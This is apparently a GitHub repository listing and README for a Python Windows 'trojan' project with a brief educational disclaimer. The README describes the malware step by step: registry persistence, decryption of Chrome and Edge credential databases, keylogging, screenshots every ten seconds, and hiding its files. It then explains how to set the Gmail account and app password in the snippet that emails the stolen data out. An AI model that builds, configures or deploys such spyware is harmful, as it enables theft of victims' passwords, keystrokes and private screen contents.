https://github.com/rigbir/trojan
https://github.com/rigbir/trojan
cybersecurity ethical-hacking malware-analysis python stealth-security trojan virus
Last synced: 11 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/rigbir/trojan
- Owner: Rigbir
- Created: 2024-11-24T20:03:41.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-11-27T19:58:51.000Z (over 1 year ago)
- Last Synced: 2025-03-12T06:31:35.069Z (over 1 year ago)
- Topics: cybersecurity, ethical-hacking, malware-analysis, python, stealth-security, trojan, virus
- Language: Python
- Homepage:
- Size: 10.7 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Trojan
### Disclaimer:
#### Any use of the Software not for training purposes entails criminal liability. The author used the code for educational purposes.
### How it Work (only on Windows):
1. The program is written to Windows startup via the registry
2. The decrypted Google database is written to a file
3. The decrypted Microsoft Edge database is written to a file
4. The keylogger starts working
5. The files from the database are sent to the mail
6. Once every 5 minutes, the keylogger file is sent to the mail
7. Screenshots every 10 seconds and sending this folder to the mail every 2 minutes
8. When the number of screenshots reaches 12, the folder with them is cleared
9. All files and folders are hidden, except for the program itself
#### The program runs in multiple threads, so all processes occur simultaneously
#### Replace it with your information ('your_gmail' and 'password_app') in __send_file__ function. (If you want test this program)
```
msg['From'] = 'your_gmail'
msg['To'] = 'your_gmail'
server.login('your_gmail', 'password_app')
```